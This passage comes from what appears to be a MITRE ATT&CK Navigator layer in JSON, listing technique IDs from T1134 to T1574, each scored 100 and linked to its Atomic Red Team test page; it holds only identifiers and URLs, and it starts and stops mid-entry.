/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanary
co/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T120
4.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004
.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.
011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"c
omment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://gi
thub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"h
ttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true
,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":1
00,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T15
48","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"tech
niqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T155
5.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001
/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T156
2.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics
/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://